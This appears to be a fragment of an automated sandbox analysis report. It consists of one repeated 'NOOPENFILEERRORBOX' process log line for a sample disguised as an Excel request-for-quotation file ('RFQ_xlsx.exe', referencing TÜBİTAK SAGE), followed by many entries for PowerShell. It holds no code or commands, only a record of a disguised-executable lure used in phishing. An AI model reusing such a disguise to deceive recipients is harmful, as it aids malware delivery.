                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
